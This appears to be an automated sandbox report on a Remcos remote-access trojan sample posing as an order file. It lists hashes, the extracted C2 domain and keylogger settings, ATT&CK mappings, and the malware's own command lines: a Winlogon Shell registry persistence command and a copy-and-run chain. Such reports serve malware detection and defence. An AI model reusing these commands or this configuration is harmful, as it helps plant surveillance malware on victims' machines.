remcos | 0642087b7349c02936433748a8e3aceda1a80937c900016a154e467d8bdb232f

Analysis

max time kernel
300s
max time network
304s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
05-02-2025 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Order490267.exe
Size

3.4MB
MD5

778a7674813e2f1e29ccd8ed1c099b26
SHA1

de6117d94e471ccc9607483e0ef3892d8a86aa87
SHA256

af3e7559f7119c73c2adc41c1cf5114b0658eb4ea58a7db63e69a72930751098
SHA512

242cbb5c13470873882472f2f03fa6a3afbc6adedc603197add1cf126778af8edcfd5536fccd4e5aef60697cb535be0ecfa3dca4578a9f5a0d10635bffd9cdc2
SSDEEP

98304:KjXNRqFJagJ2pK4JEKB5v6auTu1L07M+c:K7W5JqJH/v6acu1Lc

Score

10^/10

remcos aboki discovery persistence rat

Malware Config

Extracted

Family

remcos

Botnet

Aboki

remaboki2025.duckdns.org:56379

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-FSAI48
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\jpg.exe,"	reg.exe

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Executes dropped EXE 1 IoCs

pid	Process
836	jpg.exe

Loads dropped DLL 3 IoCs

pid	Process
2624	cmd.exe
836	jpg.exe
836	jpg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 836 set thread context of 1848	836	jpg.exe	39

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Order490267.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jpg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3004	cmd.exe
2864	PING.EXE
2624	cmd.exe
2560	PING.EXE
3056	PING.EXE

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
3056	PING.EXE
2864	PING.EXE
2560	PING.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2248	Order490267.exe
2248	Order490267.exe
2248	Order490267.exe
2248	Order490267.exe
836	jpg.exe
836	jpg.exe
836	jpg.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2248	Order490267.exe
Token: SeDebugPrivilege	836	jpg.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1848	AddInProcess32.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 3004	2248	Order490267.exe	30
PID 2248 wrote to memory of 3004	2248	Order490267.exe	30
PID 2248 wrote to memory of 3004	2248	Order490267.exe	30
PID 2248 wrote to memory of 3004	2248	Order490267.exe	30
PID 2248 wrote to memory of 3004	2248	Order490267.exe	30
PID 2248 wrote to memory of 3004	2248	Order490267.exe	30
PID 2248 wrote to memory of 3004	2248	Order490267.exe	30
PID 3004 wrote to memory of 2864	3004	cmd.exe	32
PID 3004 wrote to memory of 2864	3004	cmd.exe	32
PID 3004 wrote to memory of 2864	3004	cmd.exe	32
PID 3004 wrote to memory of 2864	3004	cmd.exe	32
PID 3004 wrote to memory of 2864	3004	cmd.exe	32
PID 3004 wrote to memory of 2864	3004	cmd.exe	32
PID 3004 wrote to memory of 2864	3004	cmd.exe	32
PID 2248 wrote to memory of 2624	2248	Order490267.exe	33
PID 2248 wrote to memory of 2624	2248	Order490267.exe	33
PID 2248 wrote to memory of 2624	2248	Order490267.exe	33
PID 2248 wrote to memory of 2624	2248	Order490267.exe	33
PID 2248 wrote to memory of 2624	2248	Order490267.exe	33
PID 2248 wrote to memory of 2624	2248	Order490267.exe	33
PID 2248 wrote to memory of 2624	2248	Order490267.exe	33
PID 2624 wrote to memory of 2560	2624	cmd.exe	35
PID 2624 wrote to memory of 2560	2624	cmd.exe	35
PID 2624 wrote to memory of 2560	2624	cmd.exe	35
PID 2624 wrote to memory of 2560	2624	cmd.exe	35
PID 2624 wrote to memory of 2560	2624	cmd.exe	35
PID 2624 wrote to memory of 2560	2624	cmd.exe	35
PID 2624 wrote to memory of 2560	2624	cmd.exe	35
PID 3004 wrote to memory of 1660	3004	cmd.exe	36
PID 3004 wrote to memory of 1660	3004	cmd.exe	36
PID 3004 wrote to memory of 1660	3004	cmd.exe	36
PID 3004 wrote to memory of 1660	3004	cmd.exe	36
PID 3004 wrote to memory of 1660	3004	cmd.exe	36
PID 3004 wrote to memory of 1660	3004	cmd.exe	36
PID 3004 wrote to memory of 1660	3004	cmd.exe	36
PID 2624 wrote to memory of 3056	2624	cmd.exe	37
PID 2624 wrote to memory of 3056	2624	cmd.exe	37
PID 2624 wrote to memory of 3056	2624	cmd.exe	37
PID 2624 wrote to memory of 3056	2624	cmd.exe	37
PID 2624 wrote to memory of 3056	2624	cmd.exe	37
PID 2624 wrote to memory of 3056	2624	cmd.exe	37
PID 2624 wrote to memory of 3056	2624	cmd.exe	37
PID 2624 wrote to memory of 836	2624	cmd.exe	38
PID 2624 wrote to memory of 836	2624	cmd.exe	38
PID 2624 wrote to memory of 836	2624	cmd.exe	38
PID 2624 wrote to memory of 836	2624	cmd.exe	38
PID 2624 wrote to memory of 836	2624	cmd.exe	38
PID 2624 wrote to memory of 836	2624	cmd.exe	38
PID 2624 wrote to memory of 836	2624	cmd.exe	38
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39
PID 836 wrote to memory of 1848	836	jpg.exe	39

C:\Users\Admin\AppData\Local\Temp\Order490267.exe
"C:\Users\Admin\AppData\Local\Temp\Order490267.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\jpg.exe,"
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 37
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\jpg.exe,"
    3⤵
    - Modifies WinLogon for persistence
    - System Location Discovery: System Language Discovery
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c ping 127.0.0.1 -n 44 > nul && copy "C:\Users\Admin\AppData\Local\Temp\Order490267.exe" "C:\Users\Admin\AppData\Roaming\jpg.exe" && ping 127.0.0.1 -n 44 > nul && "C:\Users\Admin\AppData\Roaming\jpg.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 44
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2560
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 44
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3056
- - C:\Users\Admin\AppData\Roaming\jpg.exe
    "C:\Users\Admin\AppData\Roaming\jpg.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
8de41695a119cbe521bdabca6ada10a5

SHA1
ec40e2278cbf8ba3d07af9a688ef35e1a4901d2f

SHA256
7dd078cb4a8233d67c524dba421b2c870ec74c901a9620829d9164e117f6451b

SHA512
d4f49d60ef0e0cd6f01df0708fe2eeb8a18638789a728b22a93e51b5521b062f9fe0035a289c9748ff4423fcf49544a9376750b941b78522af272289e44aa466

Download Submit
\Users\Admin\AppData\Roaming\jpg.exe

Filesize
3.4MB

MD5
778a7674813e2f1e29ccd8ed1c099b26

SHA1
de6117d94e471ccc9607483e0ef3892d8a86aa87

SHA256
af3e7559f7119c73c2adc41c1cf5114b0658eb4ea58a7db63e69a72930751098

SHA512
242cbb5c13470873882472f2f03fa6a3afbc6adedc603197add1cf126778af8edcfd5536fccd4e5aef60697cb535be0ecfa3dca4578a9f5a0d10635bffd9cdc2

Download Submit
memory/836-11-0x00000000000C0000-0x0000000000434000-memory.dmp

Filesize
3.5MB

Download
memory/836-12-0x0000000000950000-0x000000000096A000-memory.dmp

Filesize
104KB

Download
memory/836-13-0x0000000000990000-0x0000000000996000-memory.dmp

Filesize
24KB

Download
memory/1848-14-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-22-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-20-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-18-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-26-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1848-24-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-16-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-27-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-30-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-28-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-31-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-34-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-35-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-36-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-37-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-38-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-39-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-40-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-41-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-43-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-44-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-45-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-46-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-47-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-48-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-50-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-51-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-52-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-53-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-54-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-55-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-56-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-58-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-59-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-60-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-61-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-62-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-64-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-65-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-66-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-67-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-68-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-69-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-70-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-72-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-73-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-74-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-75-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-76-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-77-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-79-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-80-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-81-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-82-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1848-83-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2248-0-0x0000000001110000-0x0000000001484000-memory.dmp

Filesize
3.5MB

Download
memory/2248-1-0x00000000002D0000-0x0000000000312000-memory.dmp

Filesize
264KB

Download